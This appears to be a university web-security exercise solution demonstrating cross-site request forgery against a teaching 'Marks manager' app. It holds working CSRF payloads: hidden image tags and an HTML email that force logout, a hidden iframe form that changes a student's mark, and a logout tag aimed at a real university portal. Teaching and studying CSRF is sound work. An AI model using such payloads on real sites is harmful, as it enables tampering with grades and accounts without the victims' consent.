Exercise: Cross Site Request Forgery - CSRF

Logout of the Marks manager

  • In your first file. insert the following code: 
        Hello world
      <img src="https://www.benoist.ch/marksEsc/logout.php">
    This is not very impressive (some menus disapear) since this application does not verify that much that the user is logged in.
    Unfortunately, one can see that there was a problem in this page, since the image seams broken. We have chosen to change the size: width=1, height=1.
  • The mail you write (in HTML) must contain the following : 
          <img src="https://www.benoist.ch/marksEsc/logout.php" width="1" height="1">
    It will only work for people reading their mail inside their browser (aka Web mail).

Change marks inside the Marks Manager

  • We can create a first page : 
    contains iFrame
<iframe src="form.php">
</iframe>
    Then the form.php page that is refered : 
    
Form 
<form action='https://www.benoist.ch/marksEsc/enterMarks.php'
method='POST'>
  &th;input type='hidden' name='courseID' value ='1' />
  <input type='hidden' name='student8' value='2.0'>
  <input type='submit' value='Send marks' />
</form>
  • If the admin visits that page and clicks on the but they change the mark.

IS-A

  • To log out of IS-Accademia: insert the following code inside your page:
     <img
 src="https://is-a.bfh.ch/imoniteur_OPROAD/!logouts.out?ww_x_urlRedirect=">

    Test the solution: logout.isa.html.
    • BACK TO TOP © 2014-2021 Emmanuel Benoist